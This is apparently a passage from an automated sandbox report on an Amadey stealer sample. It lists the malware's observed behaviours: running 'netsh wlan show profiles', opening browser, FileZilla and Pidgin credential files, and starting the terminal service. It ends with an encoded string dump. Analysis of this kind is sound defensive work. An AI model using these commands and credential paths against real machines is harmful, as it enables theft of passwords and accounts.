Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1151.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.dll VolumeInformation
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.IO.Compression.FileSystem\v4.0_4.0.0.0__b77a5c561934e089\System.IO.Compression.FileSystem.dll VolumeInformation

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_003121E3 GetSystemTimeAsFileTime,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,

0_2_003121E3

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

0_2_002E61F0

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_0031F06F _free,GetTimeZoneInformation,

0_2_0031F06F

Source: C:\Users\user\Desktop\tOuVwTJrau.exe

Code function: 0_2_002E93D0 GetVersionExW,GetModuleHandleA,GetProcAddress,GetSystemInfo,

0_2_002E93D0

Lowering of HIPS / PFW / Operating System Security Settings

Uses netsh to modify the Windows network and firewall settings

Source: C:\Windows\System32\rundll32.exe

Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Stealing of Sensitive Information

Yara detected Amadeys Clipper DLL

Source: Yara match	File source: tOuVwTJrau.exe, type: SAMPLE
Source: Yara match	File source: 12.2.rundll32.exe.6c050000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 16.2.rundll32.exe.6c050000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.2.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.2.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.0.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.tOuVwTJrau.exe.2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.0.tOuVwTJrau.exe.2e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 20.0.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 22.0.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.0.Gxtuum.exe.e0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: C:\Users\user\AppData\Roaming\43266f2abbf198\clip64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\clip64[1].dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Temp\ee29ea508b\Gxtuum.exe, type: DROPPED

Yara detected Amadeys stealer DLL

Source: Yara match	File source: C:\Users\user\AppData\Roaming\43266f2abbf198\cred64.dll, type: DROPPED
Source: Yara match	File source: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\cred64[1].dll, type: DROPPED

Tries to harvest and steal WLAN passwords

Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	Process created: C:\Windows\System32\netsh.exe netsh wlan show profiles

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\z6bny8rn.default\logins.json
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CocCoc\Browser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chedot\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Opera Software\Opera Stable\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Vivaldi\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\CentBrowser\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Chromium\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\fqs92o4p.default-release\logins.json
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Orbitum\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Comodo\Dragon\User Data\Default\Login Data
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\logins.json

Tries to harvest and steal ftp login credentials

Source: C:\Windows\System32\rundll32.exe

File opened: C:\Users\user\AppData\Roaming\FileZilla\sitemanager.xml

Tries to steal Instant Messenger accounts or passwords

Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\oobe\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files (x86)\VRxzJqAPkmesVXPaOqGhoiqbUmmLwIjcAZFkSvRlPGWvLVGgPHwdiIweEvzUF\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SysWOW64\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\.purple\accounts.xml	Jump to behavior
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Roaming\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.StartMenuExperienceHost_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\Microsoft.Windows.Search_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files\WindowsApps\Microsoft.WindowsStore_11910.1002.5.0_x64__8wekyb3d8bbwe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\ImmersiveControlPanel\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\System32\oobe\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Program Files (x86)\VRxzJqAPkmesVXPaOqGhoiqbUmmLwIjcAZFkSvRlPGWvLVGgPHwdiIweEvzUF\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\AppData\Local\Temp\ee29ea508b\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Windows\SysWOW64\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\Users\user\Desktop\{6D809377-6AF0-444B-8957-A3773F02200E}\Common Files\microsoft shared\ClickToRun\.purple\accounts.xml
Source: C:\Windows\System32\rundll32.exe	File opened: C:\.purple\accounts.xml

Remote Access Functionality

Contains functionality to start a terminal service

Source: tOuVwTJrau.exe	String found in binary or memory: net start termservice
Source: tOuVwTJrau.exe, 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: net start termservice
Source: tOuVwTJrau.exe, 00000000.00000002.1674325223.0000000000331000.00000002.00000001.01000000.00000003.sdmp	String found in binary or memory: Unknown exceptionbad array new lengthstring too long: genericiostreamFail to schedule the chore!This function cannot be called on a default constructed taskbroken promisefuture already retrievedpromise already satisfiedno statefutureinvalid stoi argumentstoi argument out of rangebad locale nameios_base::badbit setios_base::failbit setios_base::eofbit setd3a5912ea69ad34a2387af70c8be9e2143266f2abbf198987ad62d4962cf71340f3be6bcafd92004fa390d280e7ea4875c9234PLgVJ 8BLeW4Obx0Eo==OrdW9wQuaXSzOUeuQyS0Lsxdex==PLgVJ 8BLeW4Obx0Fs==OrhAbdL5ahe0UyCTCUiqZLRTNkCsaE==QK4rKq==Xq0f xLxMK1mbG==OKVmbG==2OUsMMMlNOy419==UVhUbNMxLhT42I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyR6W 2I==XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7TNEpcdzTdyOs3uyCb7t 1UKDXVRbadI5cv==XeVn1U1eGs0HIAHNUweSzu6vL8A6XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712WkWyffVoXwowMuGgXzJpXTAlbSK=XS9ATv5FUfTcWOej4e6vb7VPZCet qIlgVN7OTMCchTugxSl4fKlb712TUiA K0o2PJ7SS9pbBugUe2sQySucB==MNVNPLAUUf7GVMqFAI==0wFqaq==Xw9NTq==USVOdOQ0gfM0fUQ0eVM01ek01PI0fyM0gO402y001PY0ezY0eUc0fb0=1VJfXsWobBv81Uqp4u2gbLtX1VJfXsWobBu=1UxjasWobBu=2vE=2LE=2LI=2LM=WOFj 7==dzRUatfzLr==dzRUaxD Lt6=2Phf2yxm1U1efzMrePNjhelqOVFV9MM4SyM+SyQ+OTBmbM5tbiKvNqslLo==is==MfVo9NHcSI==fUhf wnDMd3keyp=dUVs cMwMuGu2yqsUUVURcw4aSXlXVez5ySpS11bdt==XzJpXTAlbPPhgyycTNZvSRHkUX7mgz7h4eR=TPZjacv=VUFtawMCcXr5LwqhP9==UNNzTq==XyFoXwvkUXTjgPCp5zh=Uy9dbw0CIAbl19==TNZBPrYqTw04YRvT2OG14eiWeV==TelUXwMqZR3k2PB=We9sbw0yXU9q9w0DTU9n 